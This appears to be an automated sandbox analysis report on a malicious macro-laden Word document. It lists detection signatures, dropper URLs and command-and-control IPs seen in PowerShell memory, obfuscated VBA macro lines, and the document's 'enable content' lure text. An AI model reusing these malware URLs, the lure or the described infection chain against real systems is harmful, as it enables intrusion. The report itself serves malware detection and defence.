Analysis Report sample2.bin

Overview

General Information

Sample Name: sample2.bin (renamed file extension from bin to doc)
Analysis ID: 341769
MD5: 8c6a5130470766c6c8f7098c1b907250
SHA1: be5f34ede5bd1447198cc80ae16b6325ee24afe5
SHA256: 918b035fa23083286866d7ab947c9fc167e3e9c398b7e6e83cb7169056ae43d5

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/ Avira URL Cloud: Label: malware
Source: http://etdog.com/wp-content/nu/ Avira URL Cloud: Label: malware
Source: https://mikegeerinck.com/c/YYsa/ Avira URL Cloud: Label: malware
Source: http://www.stmarouns.nsw.edu.au/paypal/b8G/ Avira URL Cloud: Label: malware
Source: https://www.hintup.com.br/wp-content/dE/ Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: freelancerwebdesignerhyderabad.com Virustotal: Detection: 7% Perma Link
Source: mikegeerinck.com Virustotal: Detection: 7% Perma Link
Source: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/ Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Metadefender: Detection: 55% Perma Link
Source: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll ReversingLabs: Detection: 80%
Multi AV Scanner detection for submitted file
Source: sample2.doc Virustotal: Detection: 69% Perma Link
Source: sample2.doc Metadefender: Detection: 47% Perma Link
Source: sample2.doc ReversingLabs: Detection: 75%
Machine Learning detection for dropped file
Source: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 6_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree, 6_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree, 6_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00289506 CryptDecodeObjectEx, 9_2_00289506

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000006.00000002.2097367242.000000001000D000.00000002.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2091853172.0000000002947000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2097865298.000000001B2C0000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: admintk.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 210.56.52.6:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 210.56.52.6:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.22:49170 -> 90.160.138.175:80
Source: Traffic Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.22:49173 -> 157.245.123.197:8080
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in memory: http://wm.mcdevelop.net/content/6F2gd/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49173 -> 157.245.123.197:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cgi-bin/S/ HTTP/1.1Host: freelancerwebdesignerhyderabad.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 90.160.138.175 90.160.138.175
Source: Joe Sandbox View IP Address: 90.160.138.175 90.160.138.175
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: unknown TCP traffic detected without corresponding DNS query: 90.160.138.175
Source: unknown TCP traffic detected without corresponding DNS query: 90.160.138.175
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 74.222.117.42
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: unknown TCP traffic detected without corresponding DNS query: 157.245.123.197
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47DBF0F6-6281-436E-ADD1-2266A057AE87}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /cgi-bin/S/ HTTP/1.1Host: freelancerwebdesignerhyderabad.comConnection: Keep-Alive
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: admintk.com
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000004.00000002.2097017459.0000000003A26000.00000004.00000001.sdmp String found in binary or memory: http://freelancerwebdesignerhyderabad.com
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000005.00000002.2098288972.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095363387.0000000001F37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096411457.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096930568.00000000021C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000005.00000002.2098288972.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095363387.0000000001F37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096411457.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096930568.00000000021C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000004.00000002.2091456389.0000000002260000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2096812474.0000000002820000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097207481.0000000002870000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000005.00000002.2098288972.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095363387.0000000001F37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096411457.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096930568.00000000021C7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000005.00000002.2098288972.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095363387.0000000001F37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096411457.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096930568.00000000021C7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: http://wm.mcdevelop.net/content/6F2gd/
Source: powershell.exe, 00000004.00000002.2091456389.0000000002260000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2096812474.0000000002820000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097207481.0000000002870000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000005.00000002.2098288972.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2095363387.0000000001F37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096411457.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2096930568.00000000021C7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000005.00000002.2097896058.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094110049.0000000001D50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000004.00000002.2090995690.0000000000344000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2090995690.0000000000344000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: rundll32.exe, 00000007.00000002.2095897108.0000000001DA0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000004.00000002.2096978998.00000000039DA000.00000004.00000001.sdmp String found in binary or memory: https://admintk.com
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2098151883.000000001B456000.00000004.00000001.sdmp String found in binary or memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000004.00000002.2096978998.00000000039DA000.00000004.00000001.sdmp String found in binary or memory: https://admintk.comp
Source: powershell.exe, 00000004.00000002.2096978998.00000000039DA000.00000004.00000001.sdmp String found in binary or memory: https://mikegeerinck.com
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000004.00000002.2097017459.0000000003A26000.00000004.00000001.sdmp String found in binary or memory: https://mikegeerinck.comp
Source: powershell.exe, 00000004.00000002.2096421717.0000000003613000.00000004.00000001.sdmp String found in binary or memory: https://www.hintup.com.br/wp-content/dE/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 3 N@m 13 ;a 10096 G)
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Document contains an embedded VBA macro with suspicious strings
Source: sample2.doc OLE, VBA macro line: Set rKaiEGAC = ZvZjJVF.CreateTextFile("X:\LuIIO\zUSvuJZ.anUcEiFX")
Source: sample2.doc OLE, VBA macro line: Set zlfWC = ESVdGGu.CreateTextFile("X:\aQdtJAR\dIoLJdGXk.DPycl")
Source: sample2.doc OLE, VBA macro line: Set rnQlNSFz = wgxGCCN.CreateTextFile("X:\AJtHm\NiPwHGCtE.LBjNLRA")
Source: sample2.doc OLE, VBA macro line: Set aYxQOFcyA = SgsEjqkJD.CreateTextFile("X:\HSDrEFEt\IiQpE.dyXRfICA")
Source: sample2.doc OLE, VBA macro line: Set hEKMiE = ivEeD.CreateTextFile("X:\epqBR\aZdpe.fPcbkg")
Source: sample2.doc OLE, VBA macro line: Set FGWBvBE = CHSJDkDAG.CreateTextFile("X:\gnyBGW\WukxrA.INyMDCH")
Source: sample2.doc OLE, VBA macro line: Set eEqrOIEu = knlaQ.CreateTextFile("X:\cIptGrFvp\bdkshFqB.izOoIHJWB")
Source: sample2.doc OLE, VBA macro line: Set mcZnhAcW = VMcgDBiJB.CreateTextFile("X:\iRKEDb\JZowAFbKQ.EBWobUB")
Source: sample2.doc OLE, VBA macro line: Set RIPMPdBYI = KBtJWF.CreateTextFile("X:\XWicIGGBG\xLQNJAg.zmKQqZ")
Source: sample2.doc OLE, VBA macro line: Set fBQqDh = wifLSBCE.CreateTextFile("X:\xRyAC\ioJLBGI.pmsIgGK")
Source: sample2.doc OLE, VBA macro line: Set bwwRFDfBJ = dmDSpI.CreateTextFile("X:\vDtwpIU\KROxIwg.FKLwd")
Source: sample2.doc OLE, VBA macro line: Set DlSEFBQnB = InEpsuP.CreateTextFile("X:\syoMeFoAI\HKCQisSA.sFiqdjn")
Source: sample2.doc OLE, VBA macro line: Set GYdQF = BrroyED.CreateTextFile("X:\bRZkZb\PHuOHEZ.RgahY")
Source: sample2.doc OLE, VBA macro line: Set HKiMY = qhYfG.CreateTextFile("X:\UAcdCqJAW\bTlwHCS.tgRjCDjDm")
Source: sample2.doc OLE, VBA macro line: Set JUVgCF = KWwLAA.CreateTextFile("X:\trJaz\OJLKCFlKA.iNinBr")
Source: sample2.doc OLE, VBA macro line: Set KaunD = fefdpJHav.CreateTextFile("X:\xbiEG\tdfHICb.CQsnHB")
Source: sample2.doc OLE, VBA macro line: Set vnunE = lSiyuHDTN.CreateTextFile("X:\CCiwM\qzdYcs.rLvPF")
Source: sample2.doc OLE, VBA macro line: Set mPtWYQGIW = RzaNEDSN.CreateTextFile("X:\OzyUfAB\KwJqn.dGkAB")
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set rKaiEGAC = ZvZjJVF.CreateTextFile("X:\LuIIO\zUSvuJZ.anUcEiFX") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set zlfWC = ESVdGGu.CreateTextFile("X:\aQdtJAR\dIoLJdGXk.DPycl") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set rnQlNSFz = wgxGCCN.CreateTextFile("X:\AJtHm\NiPwHGCtE.LBjNLRA") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set aYxQOFcyA = SgsEjqkJD.CreateTextFile("X:\HSDrEFEt\IiQpE.dyXRfICA") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set hEKMiE = ivEeD.CreateTextFile("X:\epqBR\aZdpe.fPcbkg") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set FGWBvBE = CHSJDkDAG.CreateTextFile("X:\gnyBGW\WukxrA.INyMDCH") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set eEqrOIEu = knlaQ.CreateTextFile("X:\cIptGrFvp\bdkshFqB.izOoIHJWB") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set mcZnhAcW = VMcgDBiJB.CreateTextFile("X:\iRKEDb\JZowAFbKQ.EBWobUB") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set RIPMPdBYI = KBtJWF.CreateTextFile("X:\XWicIGGBG\xLQNJAg.zmKQqZ") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set fBQqDh = wifLSBCE.CreateTextFile("X:\xRyAC\ioJLBGI.pmsIgGK") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set bwwRFDfBJ = dmDSpI.CreateTextFile("X:\vDtwpIU\KROxIwg.FKLwd") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String createtextfile: Set DlSEFBQnB = InEpsuP.CreateTextFile("X:\syoMeFoAI\HKCQisSA.sFiqdjn") Name: Wdjacjouyfqc1ii9
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Flv_fi4bjhyskj026u, String createtextfile: Set GYdQF = BrroyED.CreateTextFile("X:\bRZkZb\PHuOHEZ.RgahY") Name: Flv_fi4bjhyskj026u
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Flv_fi4bjhyskj026u, String createtextfile: Set HKiMY = qhYfG.CreateTextFile("X:\UAcdCqJAW\bTlwHCS.tgRjCDjDm") Name: Flv_fi4bjhyskj026u
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Flv_fi4bjhyskj026u, String createtextfile: Set JUVgCF = KWwLAA.CreateTextFile("X:\trJaz\OJLKCFlKA.iNinBr") Name: Flv_fi4bjhyskj026u
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Flv_fi4bjhyskj026u, String createtextfile: Set KaunD = fefdpJHav.CreateTextFile("X:\xbiEG\tdfHICb.CQsnHB") Name: Flv_fi4bjhyskj026u
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Ndxa_n7luk7, String createtextfile: Set vnunE = lSiyuHDTN.CreateTextFile("X:\CCiwM\qzdYcs.rLvPF") Name: Ndxa_n7luk7
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Ndxa_n7luk7, String createtextfile: Set mPtWYQGIW = RzaNEDSN.CreateTextFile("X:\OzyUfAB\KwJqn.dGkAB") Name: Ndxa_n7luk7
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String QDcWvjFHGLRJKDHB
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String TcaTACdAbrcA
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Wdjacjouyfqc1ii9, String MLeqApwwMZPJ
Source: VBA code instrumentation OLE, VBA macro: Module Ewjwp7hpm073, Function Flv_fi4bjhyskj026u, String LqhjdBNebXCA
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5493
Source: unknown Process created: Commandline size = 5397
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5397 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
